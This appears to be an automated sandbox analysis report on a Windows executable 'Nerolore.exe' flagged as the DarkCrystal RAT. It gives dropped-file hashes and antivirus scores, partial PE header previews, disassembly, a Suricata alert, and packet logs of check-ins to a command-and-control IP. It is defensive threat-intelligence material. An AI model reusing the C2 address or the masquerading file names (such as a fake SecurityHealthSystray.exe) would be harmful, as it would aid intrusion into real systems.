                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 8%
                              • Antivirus: Virustotal, Detection: 11%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\goYNyXVt.log

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):33792
                              Entropy (8bit):5.541771649974822
                              Encrypted:false
                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 29%
                              • Antivirus: Virustotal, Detection: 27%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\vBGRGbPj.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):23552
                              Entropy (8bit):5.519109060441589
                              Encrypted:false
                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 8%
                              • Antivirus: Virustotal, Detection: 11%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                              C:\Users\user\Desktop\xvosSKAI.log

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):69632
                              Entropy (8bit):5.932541123129161
                              Encrypted:false
                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 17%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                              C:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):1224
                              Entropy (8bit):4.435108676655666
                              Encrypted:false
                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                              MD5:931E1E72E561761F8A74F57989D1EA0A
                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                              Malicious:false
                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                              C:\Windows\System32\SecurityHealthSystray.exe

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4608
                              Entropy (8bit):3.9667612782894692
                              Encrypted:false
                              SSDEEP:48:6xJ3PteM7Jt8Bs3FJsdcV4MKe27Rd4u8Ln+vqBHKOulajfqXSfbNtm:IP9Pc+Vx9MgLn+vk0cjRzNt
                              MD5:C51809D570407388483DC19E072A55FE
                              SHA1:A1E3B198DB132B65B1B97AA0EF5315DD92FA388D
                              SHA-256:F7B458D725B669605C71A1A2F8AB83C9F1540ED1E338A900312DFC8776756E4A
                              SHA-512:8CE5EC56D0E021B645C591A375050B8A6D23366C65501EC0F81162880BF7B770A0F07BE0A0ECEF5594A9DD6AF07D19ADF81A9CC1C55DBC4607330A261D8760F8
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...VC.f.............................'... ...@....@.. ....................................@.................................`'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..8.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                              \Device\Null

                              Download File
                              Process:C:\Windows\System32\w32tm.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.779332558763312
                              Encrypted:false
                              SSDEEP:3:VLV993J+miJWEoJ8FX7IFBunRPVqvo135IqNvj:Vx993DEUR8RLEM
                              MD5:C977DD546B863B195831DB52F8D30D33
                              SHA1:75CFDD394F2548E924A152D9F3A2D7049167D3EF
                              SHA-256:0F68B5BA34A30CE0A970414D86A86A40ABA00D7B8045524AFA99B1DDDAECE10A
                              SHA-512:6B53BDBA356BC69591CA6A6E84D060A79A07277A0B235F11A3F8C2A087F2E4EECF17E387F8A9D5469B4FE5EC8A158DCA18121B45E641C6507BEB2DB58D1F8C91
                              Malicious:false
                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/08/2024 10:44:41..10:44:41, error: 0x80072746.10:44:46, error: 0x80072746.

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.690714550424996
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Nerolore.exe
                              File size:3'514'624 bytes
                              MD5:173524b924df7f85fc534a492707f643
                              SHA1:44362f40b387610d723ba6090ffacf5a17f98bd3
                              SHA256:9559e225f13920d3f18a77d324a732447c67b85073af3044237d51eefdbec0a2
                              SHA512:8e73fe1da84d8ccadf9b1134b5822777eaf104724485181aef5e59f03e98772957856d6a497fe32fd86550dc7b5dc2e9edc442e2c985b458d2ffa3f1c71a4e93
                              SSDEEP:98304:cakXfhdOVlgEzgxRe1fiPTqMebcUvt7MGo:ov2dzgy+ucCt7No
                              TLSH:CAF5E05658823D32C1989F304252327D54A1DEB97496EE0A780E30E36DBFBF45A762F3
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                              File Icon

                              Icon Hash:04303a323a1a1804

                              Static PE Info

                              General

                              Entrypoint:0x40c0d4
                              Entrypoint Section:
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:d89f3dcdac0c8dba11dc1162435bedbb

                              Entrypoint Preview

                              Instruction
                              call 00007FC714D30026h
                              jmp 00007FC714D2FE3Eh
                              push 0044BB60h
                              push dword ptr fs:[00000000h]
                              mov eax, dword ptr [esp+10h]
                              mov dword ptr [esp+10h], ebp
                              lea ebp, dword ptr [esp+10h]
                              sub esp, eax
                              push ebx
                              push esi
                              push edi
                              mov eax, dword ptr [00466ECCh]
                              xor dword ptr [ebp-04h], eax
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-18h], esp
                              push dword ptr [ebp-08h]
                              mov eax, dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              mov dword ptr [ebp-08h], eax
                              lea eax, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              mov ecx, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], ecx
                              pop ecx
                              pop edi
                              pop edi
                              pop esi
                              pop ebx
                              mov esp, ebp
                              pop ebp
                              push ecx
                              ret
                              int3
                              int3
                              int3
                              add esp, 04h
                              jmp 00007FC715178E8Fh
                              cdq
                              inc ecx
                              popad
                              fistp qword ptr [8E50D7DCh]
                              pop esp
                              mov ecx, 3230072Dh
                              add esp, dword ptr [esi+07h]
                              dec eax
                              fld dword ptr [ecx+56F1E397h]
                              bound esp, dword ptr [ebx+14h]
                              jbe 00007FC714D2FF97h
                              shr dword ptr [edx+7Fh], 57h
                              xchg cl, ah
                              mov dword ptr [edx+32h], ebp
                              movsd
                              or esi, 19ECC7ABh
                              cmpsb
                              not dword ptr [ebx]
                              stc
                              popfd
                              xchg eax, ecx
                              jc 00007FC714D2FFFDh
                              fdivr qword ptr [esi+edi*8+1Dh]
                              scasb
                              arpl word ptr [edx+3DAB5907h], bp
                              mov cl, 4Ah

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x3710200x34cheat
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3710540x210cheat
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x43d2c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3710000xccheat
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x320000x1be00529c48991506a3bf2bac15719e13e781False0.9972673766816144data7.996595675539958IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x330000xb0000x48009802a5374670305727a4dccb3a9eebe9False0.9949001736111112data7.979931163938514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x3e0000x250000x80063dee323469ab12c85a8eff2e1cf0670False0.91162109375data7.481225763284233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x630000x10000x200950aaa43d88a78b7e3d61706d93a8fceFalse0.447265625data3.736202914992948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x640000x470000x26006b4356c87c8083ada28595f8d33d11f4False0.9839638157894737data7.944529268421742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0xab0000x30000x2000d927fc8f4c02ae4a77b9c99bcad7a431False0.958740234375data7.852938121836332IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xae0000x440000x43e00eade0d48852f87b43908ce2cf1642fdfFalse0.09729296155616943data5.031754772122344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0xf20000x27f0000x2ba00b4eba047bbe81d8ac31ad86e90e657afunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cheat0x3710000xe70000xe6c00f5ff2c4725e6783e4f543d5970bb4bfbFalse0.99721420469935data7.987925279314385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              PNG0x645240xb45dataEnglishUnited States1.0038128249566725
                              PNG0x6506c0x15a9dataEnglishUnited States0.97302679217958
                              RT_ICON0xae5240x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.08887993017131698
                              RT_DIALOG0xa86400x286emptyEnglishUnited States0
                              RT_DIALOG0xa88c80x13aemptyEnglishUnited States0
                              RT_DIALOG0xa8a040xecemptyEnglishUnited States0
                              RT_DIALOG0xa8af00x12eemptyEnglishUnited States0
                              RT_DIALOG0xa8c200x338emptyEnglishUnited States0
                              RT_DIALOG0xa8f580x252emptyEnglishUnited States0
                              RT_STRING0xf054c0x1e2dataEnglishUnited States0.3900414937759336
                              RT_STRING0xf07300x1ccdataEnglishUnited States0.4282608695652174
                              RT_STRING0xf08fc0x1b8dataEnglishUnited States0.45681818181818185
                              RT_STRING0xf0ab40x146dataEnglishUnited States0.5153374233128835
                              RT_STRING0xf0bfc0x46cdataEnglishUnited States0.3454063604240283
                              RT_STRING0xf10680x166dataEnglishUnited States0.49162011173184356
                              RT_STRING0xf11d00x152dataEnglishUnited States0.5059171597633136
                              RT_STRING0xf13240x10adataEnglishUnited States0.49624060150375937
                              RT_STRING0xf14300xbcdataEnglishUnited States0.6329787234042553
                              RT_STRING0xf14ec0xd6dataEnglishUnited States0.5747663551401869
                              RT_GROUP_ICON0xf15c40x14data1.1
                              RT_MANIFEST0xf15d80x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                              Imports

                              DLLImport
                              kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                              user32.dllMessageBoxA
                              advapi32.dllRegCloseKey
                              oleaut32.dllSysFreeString
                              gdi32.dllCreateFontA
                              shell32.dllShellExecuteA
                              version.dllGetFileVersionInfoA
                              gdiplus.dllGdipAlloc

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-25T15:43:29.322612+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14971280192.168.2.580.211.144.156

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 25, 2024 15:43:28.543685913 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:28.548798084 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:28.548907042 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:28.549983025 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:28.554991007 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:28.923659086 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:28.928853035 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:29.218148947 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:29.322532892 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:29.322582960 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:29.322612047 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:29.397557020 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.143950939 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.150418043 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:30.348388910 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:30.348594904 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.353477001 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:30.635669947 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:30.694411039 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.954873085 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.959892035 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:30.959975004 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.960289001 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:30.965148926 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.128810883 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.130153894 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.134219885 CEST804971280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.134279966 CEST4971280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.135039091 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.135288000 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.135437965 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.140360117 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.319657087 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.324767113 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.324781895 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.491549015 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.496704102 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.496720076 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.496730089 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.628186941 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.678807020 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.758878946 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.805124044 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.845976114 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.851285934 CEST804971680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:31.851592064 CEST4971680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:31.881907940 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.515757084 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.516906023 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.521009922 CEST804971380.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:32.521070004 CEST4971380192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.521716118 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:32.521779060 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.522006035 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.526837111 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:32.866425991 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:32.871390104 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:32.871409893 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:32.871418953 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.188508987 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.241287947 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.318423033 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.319860935 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.331057072 CEST804971780.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.331134081 CEST4971780192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.491961956 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.497077942 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.497232914 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.497642994 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.502477884 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.850769043 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:33.855880976 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.855895042 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:33.855907917 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.179826021 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.225649118 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.317744017 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.366309881 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.462248087 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.464117050 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.467969894 CEST805985480.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.468033075 CEST5985480192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.469048023 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.469126940 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.469352007 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.474220991 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.869596958 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:34.874675989 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.874692917 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:34.874703884 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:35.141046047 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:35.194453955 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:35.274677992 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:35.319519997 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:35.400852919 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:35.509973049 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:35.510082960 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:35.512465954 CEST805985680.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:35.512557983 CEST5985680192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.181266069 CEST5985980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.186485052 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.186589003 CEST5985980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.210166931 CEST5985980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.215030909 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.569796085 CEST5985980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.576255083 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.576267004 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.576275110 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.859667063 CEST5986280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.860337019 CEST5985980192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.864871979 CEST805986280.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.864949942 CEST5986280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.865154982 CEST5986280192.168.2.580.211.144.156
                              Aug 25, 2024 15:43:36.865483046 CEST805985980.211.144.156192.168.2.5
                              Aug 25, 2024 15:43:36.865560055 CEST5985980192.168.2.580.211.144.156
